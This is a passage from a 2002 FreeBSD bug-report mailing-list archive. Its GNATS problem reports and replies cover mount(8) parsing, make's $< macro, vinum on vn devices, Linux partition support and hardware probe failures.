with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 8:20: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DF4A637B41B for ; Thu, 18 Apr 2002 08:20:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IFK3e37913; Thu, 18 Apr 2002 08:20:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 18 Apr 2002 08:20:03 -0700 (PDT) Message-Id: <200204181520.g3IFK3e37913@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Vladimir B. " Grebenschikov Subject: Re: kern/37227: VMWare do not work with raw disks due to invalid device hadling by linuxlator Reply-To: "Vladimir B. " Grebenschikov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/37227; it has been noted by GNATS. From: "Vladimir B. " Grebenschikov To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: kern/37227: VMWare do not work with raw disks due to invalid device hadling by linuxlator Date: 18 Apr 2002 20:18:06 +0500 And more, I think this bug present on FreeBSD-4 after 4.3-RELEASE (whe block devices disappear) -- SW Soft, Moscow Vladimir B. Grebenschikov, vova@sw.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 8:40:26 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C63AB37B405 for ; Thu, 18 Apr 2002 08:40:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IFe3C41106; Thu, 18 Apr 2002 08:40:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 18 Apr 2002 08:40:03 -0700 (PDT) Message-Id: <200204181540.g3IFe3C41106@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: bin/37224: make: $< only set for implicit rules Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37224; it has been noted by GNATS. From: Ruslan Ermilov To: Gerald Pfeifer Cc: bug-followup@freebsd.org Subject: Re: bin/37224: make: $< only set for implicit rules Date: Thu, 18 Apr 2002 18:30:05 +0300 --pZs/OQEoSSbxGlYw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 18, 2002 at 04:19:39PM +0200, Gerald Pfeifer wrote: > On Thu, 18 Apr 2002, Ruslan Ermilov wrote: > >> GNU make prints bar.c in both cases, and also my reading of > >> IEEE Std 1003.1-2001 indicates that make(1) is incorrect here. > > No, POSIX.1-2001 requests the $< to be defined in the "inference" rules, > > i.e., .c.o type of rules. For "target" rules, like "foo: bar.c" above, > > it should be undefined: > > : $< In an inference rule, the $< macro shall evaluate to the > > : filename whose existence allowed the inference rule to be > > : chosen for the target. In the .DEFAULT rule, the $< macro > > : shall evaluate to the current target name. The meaning of > > : the $< macro shall be otherwise unspecified. For example, > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > : in the .c.a inference rule, $< represents the prerequisite > > : .c file. >=20 > This was my first thinking as well, but then I got apparently confused by > the standard. :-( >=20 > > I think this PR can be closed. >=20 > If this isn't a bug in the implementation, the man page for make(1) should > be updated. The following certainly is not sufficient: >=20 > .IMPSRC The name/path of the source from which the target is to > be transformed (the ``implied'' source); also known as > `<'. >=20 > The current man page even does not contain the string "inference" at all, > and the above is the only reference to "implied" as well. >=20 > In other words, even if the implementation is correct, there is certainly > a lack of documentation, so instead of closing the PR it ought to be moved > from bin to doc in this case. >=20 In PMake, they are called "Transformation Rules", and are well documented in section 3.1 of the SEE ALSO referenced document. Have a look at it. Sad as it is, we aren't allowed to directly take and incorporate POSIX texts, though they apparently took BSD manuals as the basis. Cheers, --=20 Ruslan Ermilov Sysadmin and DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age --pZs/OQEoSSbxGlYw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8vuZ9Ukv4P6juNwoRAhIqAJ0VuImc5FXzeoyG+RTzCYeePxKdwgCfTup3 ckW+YnQdgwyW1sWfTxd/WrA= =fZqU -----END PGP SIGNATURE----- --pZs/OQEoSSbxGlYw-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 10: 0:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A705F37B41D for ; Thu, 18 Apr 2002 10:00:14 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IH0EB58859; Thu, 18 Apr 2002 10:00:14 -0700 (PDT) (envelope-from gnats) Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id 8D66037B41C for ; Thu, 18 Apr 2002 09:55:26 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.2/8.12.2) with ESMTP id g3IGtOYm090428 for ; Thu, 18 Apr 2002 09:55:24 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.2/8.12.2/Submit) id g3IGs9in090412; Thu, 18 Apr 2002 09:54:09 -0700 (PDT) Message-Id: <200204181654.g3IGs9in090412@dragon.nuxi.com> Date: Thu, 18 Apr 2002 09:54:09 -0700 (PDT) From: "David O'Brien" Reply-To: "David O'Brien" To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/37230: mount(8) improperly parses mount device to determin if NFS Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37230 >Category: bin >Synopsis: mount(8) improperly parses mount device to determin if NFS >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Apr 18 10:00:14 PDT 2002 >Closed-Date: >Last-Modified: >Originator: David O'Brien >Release: FreeBSD 5.0-CURRENT i386 >Organization: >Environment: System: FreeBSD dragon.nuxi.com 5.0-CURRENT FreeBSD 5.0-CURRENT #238: Fri Feb 22 21:56:02 PST 2002 rootk@dragon.nuxi.com:/FBSD/src/sys/i386/compile/DRAGON i386 >Description: mount(8) will believe mounts to be "-t nfs" when they obviously are not and cannot be. Mount does not use the RFC definition of a hostname or IP address to determin if something is a hostname or not followed by a ':'. From the example below you can see that mount(8) believed "/FBSD/snapshot.20020418_09" was a hostname. >How-To-Repeat: # mount -u -o snapshot /FBSD/snapshot.20020418_09:35 /FBSD nfs: -o snapshot: option not supported >Fix: fix command line parsing done by mount(8) so an explicit "-t ffs" does not have to be used. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 10:10:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E8DA037B41C for ; Thu, 18 Apr 2002 10:10:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IHA2563885; Thu, 18 Apr 2002 10:10:02 -0700 (PDT) (envelope-from gnats) Date: Thu, 18 Apr 2002 10:10:02 -0700 (PDT) Message-Id: <200204181710.g3IHA2563885@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Malone Subject: Re: bin/37230: mount(8) improperly parses mount device to determin if NFS Reply-To: David Malone Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37230; it has been noted by GNATS. From: David Malone To: David O'Brien Cc: FreeBSD-gnats-submit@FreeBSD.org Subject: Re: bin/37230: mount(8) improperly parses mount device to determin if NFS Date: Thu, 18 Apr 2002 18:05:14 +0100 On Thu, Apr 18, 2002 at 09:54:09AM -0700, David O'Brien wrote: > >Description: > > mount(8) will believe mounts to be "-t nfs" when they obviously > are not and cannot be. Mount does not use the RFC definition > of a hostname or IP address to determin if something is a hostname > or not followed by a ':'. From the example below you can see that > mount(8) believed "/FBSD/snapshot.20020418_09" was a hostname. I think this is a duplicate of 33809? David. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 10:20: 6 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3D48C37B404 for ; Thu, 18 Apr 2002 10:20:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IHK3v65518; Thu, 18 Apr 2002 10:20:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 18 Apr 2002 10:20:03 -0700 (PDT) Message-Id: <200204181720.g3IHK3v65518@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "David O'Brien" Subject: Re: bin/37230: mount(8) improperly parses mount device to determin if NFS Reply-To: "David O'Brien" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37230; it has been noted by GNATS. From: "David O'Brien" To: David Malone Cc: FreeBSD-gnats-submit@FreeBSD.org Subject: Re: bin/37230: mount(8) improperly parses mount device to determin if NFS Date: Thu, 18 Apr 2002 10:16:58 -0700 On Thu, Apr 18, 2002 at 06:05:14PM +0100, David Malone wrote: > On Thu, Apr 18, 2002 at 09:54:09AM -0700, David O'Brien wrote: > > >Description: > > > > mount(8) will believe mounts to be "-t nfs" when they obviously > > are not and cannot be. Mount does not use the RFC definition > > of a hostname or IP address to determin if something is a hostname > > or not followed by a ':'. From the example below you can see that > > mount(8) believed "/FBSD/snapshot.20020418_09" was a hostname. > > I think this is a duplicate of 33809? Yes and no. The patch in that PR is against mount_nfs, where to fix my problem mount.c needs fixing. Also the suggested fix will not fix my problem as the suggested fix assumes there will be ':' that should be handled specially (because only NFS was considered). I would suggest putting a "see also" in both PR's; or the meat of my PR to 33809. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 10:30:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 687E137B400 for ; Thu, 18 Apr 2002 10:30:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IHU2j66908; Thu, 18 Apr 2002 10:30:02 -0700 (PDT) (envelope-from gnats) Received: from mile.nevermind.kiev.ua (freebsddiary.org.ua [213.186.199.26]) by hub.freebsd.org (Postfix) with ESMTP id 9445137B41D for ; Thu, 18 Apr 2002 10:20:58 -0700 (PDT) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.2/8.12.2) with ESMTP id g3IHKo8W045013 for ; Thu, 18 Apr 2002 20:20:52 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.2/8.12.2/Submit) id g3IHKogs045012; Thu, 18 Apr 2002 20:20:50 +0300 (EEST) Message-Id: <200204181720.g3IHKogs045012@mile.nevermind.kiev.ua> Date: Thu, 18 Apr 2002 20:20:50 +0300 (EEST) From: Nevermind Reply-To: Nevermind To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/37231: vinum cannot make mirroring on vn(4) devices Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37231 >Category: kern >Synopsis: vinum cannot make mirroring on vn(4) devices >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Apr 18 10:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Nevermind >Release: FreeBSD 4.5-STABLE i386 >Organization: Net.Style Ltd. >Environment: FreeBSD mile.nevermind.kiev.ua 4.5-STABLE FreeBSD 4.5-STABLE #0: Mon Apr 15 18:52:17 EEST 2002 root@mile.nevermind.kiev.ua:/usr/obj/usr/src/sys/mile i386 FreeBSD kurush.unknown.com.ua 4.4-RELEASE-p9 FreeBSD 4.4-RELEASE-p9 #0: Tue Apr 16 17:40:56 EEST 2002 root@kurush.unknown.com.ua:/usr/obj/usr/src/sys/kurush i386 >Description: vinum(4) cannot create mirror volume (and, I suppose, all other types of volumes) on vn(4)-created disks: dd if=/dev/zero of=0 bs=1k count=16k dd if=/dev/zero of=1 bs=1k count=16k vnconfig -e -s labels,reserve vn0 0 vnconfig -e -s labels,reserve vn1 1 disklabel -r -w vn0 auto disklabel -r -w vn1 auto Then disklabel and create 'h' partition with type vinum: disklabel -e vn0 # size offset fstype [fsize bsize bps/cpg] c: 32768 0 unused 0 0 # (Cyl. 0 - 15) h: 32768 0 vinum # (Cyl. 0 - 15) disklabel -e vn1 # size offset fstype [fsize bsize bps/cpg] c: 32768 0 unused 0 0 # (Cyl. 0 - 15) h: 32768 0 vinum # (Cyl. 0 - 15) vinum.conf: drive drive1 device /dev/vn0h drive drive2 device /dev/vn1h volume mirror setupstate plex name mymirror.drive1 org concat sd length 16m drive drive1 plex name mymirror.drive2 org concat sd length 16m drive drive2 vinum -> create -f /etc/vinum.conf 5: sd length 16m drive drive1 ** 5 No space for on drive1: No space left on device 7: sd length 16m drive drive2 ** 7 No space for on drive2: No space left on device 2 drives: D drive1 State: up Device /dev/vn0h Avail: 31/16 MB (200%) D drive2 State: up Device /dev/vn1h Avail: 31/16 MB (200%) 1 volumes: V mirror State: up Plexes: 1 Size: 0 B 2 plexes: P mymirror.drive1 C State: up Subdisks: 0 Size: 0 B P mymirror.drive2 C State: up Subdisks: 0 Size: 0 B -2 subdisks: Error does not occur when using regular disks, not vn(4)-created. >How-To-Repeat: Look at Description: section. >Fix: N/A >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 12:20:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1038237B41A for ; Thu, 18 Apr 2002 12:20:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IJK3M94000; Thu, 18 Apr 2002 12:20:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 18 Apr 2002 12:20:03 -0700 (PDT) Message-Id: <200204181920.g3IJK3M94000@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Aggelos Economopoulos Subject: Re: kern/37063: [PATCH] kernel does not support extended linux partitions Reply-To: Aggelos Economopoulos Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/37063; it has been noted by GNATS. From: Aggelos Economopoulos To: Bruce Evans Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/37063: [PATCH] kernel does not support extended linux partitions Date: Thu, 18 Apr 2002 22:19:18 +0300 On Thursday 18 April 2002 13:51, Bruce Evans wrote: > On Tue, 16 Apr 2002, [iso-8859-7] ¶ããåëïò Ïéêïíïìüðïõëïò wrote: > > On Tuesday 16 April 2002 04:00, Bruce Evans wrote: > > > I don't agree with changing the current behaviour. Using extended > > > Linux partitions mainly breaks inter-operability with other OS's, > > > including previous versions of FreeBSD. > > > > But I'm not suggesting people to use 0x85 partitions. I' m merely > > suggesting that the kernel should provide for people who, for whatever > > reason (inertia?), are stuck with them. Some people call _this_ > > interoperability. > > I'd concerned about breaking configurations that use 0x85 for something > else. Even if it is for a Linux extended partition, recognizing it will > reorder the slice numbers for logical drives within ordinary extended > partitions if the Linux one is scanned first. Good point. I could argue that we can deal with this situation, but just thinking about the ugliness of the resulting code makes me want to puke. Please close the pr. Read on for the historical data you requested > > BTW, to my knowledge, extended linux partitions were used (in place of > > 0x05) to prevent certain versions of dos fdisk from crashing when it > > tries to follow beyond cyl 1024, that is, to preserve compatibility. (so > > for some people, using 0x85 could be a neccessity) > > Perhaps this is not really a problem now. I sometimes boot DOS-4.1 (1988 > version), and it is certainly confused by cylinders beyond 1024, but using > magic extended partition types wouldn't help much because it is the primary > partitions beyond cylinder 1024 that cause the biggest problems :-). > > Do you know which versions of Linux default to using 0x85? None that I know of. > The version > of Linux fdisk that I have handy (built on Apr 23 1997) doesn't mention > partition 0x85, but IIRC the Linux kernel support for partition 0x85 is > older. Much older. First appeared in 1.3.3x, that is, circa Nov 1995 > Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 14:50:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E32E737B41A; Thu, 18 Apr 2002 14:50:14 -0700 (PDT) Received: (from mux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3ILoEH24117; Thu, 18 Apr 2002 14:50:14 -0700 (PDT) (envelope-from mux) Date: Thu, 18 Apr 2002 14:50:14 -0700 (PDT) From: Message-Id: <200204182150.g3ILoEH24117@freefall.freebsd.org> To: mux@FreeBSD.org, freebsd-bugs@FreeBSD.org, mux@FreeBSD.org Subject: Re: bin/37230: mount(8) improperly parses mount device to determin if NFS Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: mount(8) improperly parses mount device to determin if NFS Responsible-Changed-From-To: freebsd-bugs->mux Responsible-Changed-By: mux Responsible-Changed-When: Thu Apr 18 14:49:46 PDT 2002 Responsible-Changed-Why: I will take care of this problem. http://www.freebsd.org/cgi/query-pr.cgi?pr=37230 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 14:52:39 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AB4E537B435; Thu, 18 Apr 2002 14:52:21 -0700 (PDT) Received: (from mux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3ILqLN24487; Thu, 18 Apr 2002 14:52:21 -0700 (PDT) (envelope-from mux) Date: Thu, 18 Apr 2002 14:52:21 -0700 (PDT) From: Message-Id: <200204182152.g3ILqLN24487@freefall.freebsd.org> To: mux@FreeBSD.org, freebsd-bugs@FreeBSD.org, mux@FreeBSD.org Subject: Re: bin/33809: mount_nfs has trouble with embedded ':' in path Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: mount_nfs has trouble with embedded ':' in path Responsible-Changed-From-To: freebsd-bugs->mux Responsible-Changed-By: mux Responsible-Changed-When: Thu Apr 18 14:50:26 PDT 2002 Responsible-Changed-Why: I will take care of this problem (related to PR/37230). http://www.freebsd.org/cgi/query-pr.cgi?pr=33809 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 20:10:34 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E343C37B41D for ; Thu, 18 Apr 2002 20:10:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J3A1992133; Thu, 18 Apr 2002 20:10:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2368337B404 for ; Thu, 18 Apr 2002 20:03:32 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J33WO87723; Thu, 18 Apr 2002 20:03:32 -0700 (PDT) (envelope-from nobody) Message-Id: <200204190303.g3J33WO87723@freefall.freebsd.org> Date: Thu, 18 Apr 2002 20:03:32 -0700 (PDT) From: Karl Heller To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/37240: EtherExpress16 not probed at boot Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37240 >Category: i386 >Synopsis: EtherExpress16 not probed at boot >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Apr 18 20:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Karl Heller >Release: 4.5 >Organization: >Environment: Custom kernel, Generic has same problem. >Description: Intell EtherExpress 16 is not probed at boot.. nor when specifically compiled in a custom kernel. Does not show up in the boot -v. Similar to bug http://www.FreeBSD.org/cgi/query-pr.cgi?pr=19499 Hardware: FIC VIA 503+ motherboard revision 1.2A AMD K6-2 500 Creative labs Graphics blaster Riva TNT 128MB PC100 CAS 2 4.3 GB Hard drive with 2 primary Slices (Win98, BSD) 300 MB extended slice Note: Booting use a 3.4R kernel floppy does find the card. I have not had time to test other releases in the 4.x line to determine when support was dropped. >How-To-Repeat: Boot the 4.5R generic boot floppy on a system with an EtherExpress16. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 0:10: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C2BB37B41F for ; Fri, 19 Apr 2002 00:10:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J7A1k43550; Fri, 19 Apr 2002 00:10:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BE9CA37B67E for ; Fri, 19 Apr 2002 00:04:58 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J74wb38992; Fri, 19 Apr 2002 00:04:58 -0700 (PDT) (envelope-from nobody) Message-Id: <200204190704.g3J74wb38992@freefall.freebsd.org> Date: Fri, 19 Apr 2002 00:04:58 -0700 (PDT) From: Pekka Savola To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/37242: mergemaster from 4.3 -> 4.5 fails due to missing smmsp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37242 >Category: misc >Synopsis: mergemaster from 4.3 -> 4.5 fails due to missing smmsp >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 00:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Pekka Savola >Release: 4.3-RELEASE, 4.5-STABLE >Organization: Netcore Oy >Environment: >Description: Mergemaster to 4.5-STABLE from 4.3-RELEASE fails: --8<-- [...] mtree -deU -f /usr/src/etc/mtree/BSD.var.dist -p /var/tmp/temproot/var mtree: line 63: unknown user smmsp *** Error code 1 Stop in /usr/src/etc. *** FATAL ERROR: Cannot 'cd' to /usr/src/etc and install files to the temproot environment --8<-- And similarly for group smmsp. This is due to the fact that smmsp did not exist in passwd and group in 4.3-RELEASE yet. >How-To-Repeat: See above. >Fix: Workaround: insert smmsp into passwd with vipw, and to group via editing. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 0:20:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F40337B41F for ; Fri, 19 Apr 2002 00:20:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J7K1M44798; Fri, 19 Apr 2002 00:20:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5D26F37B405 for ; Fri, 19 Apr 2002 00:14:21 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J7ELP43985; Fri, 19 Apr 2002 00:14:21 -0700 (PDT) (envelope-from nobody) Message-Id: <200204190714.g3J7ELP43985@freefall.freebsd.org> Date: Fri, 19 Apr 2002 00:14:21 -0700 (PDT) From: antonio tuozzo To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/37243: dvd rom - ata0-slave: identify retries exceeded Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37243 >Category: i386 >Synopsis: dvd rom - ata0-slave: identify retries exceeded >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 00:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: antonio tuozzo >Release: FreeBSD 4.5-RELEASE #0 >Organization: n/a >Environment: FreeBSD cuba.localhost 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Thu Apr 18 17:03:06 GMT 2002 root@cuba.localhost:/usr/src/sys/compile/mykrnl i386 >Description: I have successfully installed the operative system (on notebook asus lk8400), but at next boot FreeBDS (i have tried 4.4 - 4.5 and 5.0 version) does not find dvd-rom. This is dmesg output: atapci0: port 0xa800-0xa80f at device 31.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 ........ ata0-slave: identify retries exceeded I have also tried different configuration of the kernel and different configurations of the bios without to obtain not any result. However, dvd-rom works fine with win2k server and linux >How-To-Repeat: Always!! >Fix: Hitting spacebar when it boots and leaving it alone for a few minutes, and then typing boot. However this rimedy (advised me by toby hutton) does not work every time. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 0:40:48 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AAB2D37B41A for ; Fri, 19 Apr 2002 00:40:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J7e1Z47707; Fri, 19 Apr 2002 00:40:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1D6BC37B405 for ; Fri, 19 Apr 2002 00:39:02 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3J7d2j47524; Fri, 19 Apr 2002 00:39:02 -0700 (PDT) (envelope-from nobody) Message-Id: <200204190739.g3J7d2j47524@freefall.freebsd.org> Date: Fri, 19 Apr 2002 00:39:02 -0700 (PDT) From: Clint Olsen To: 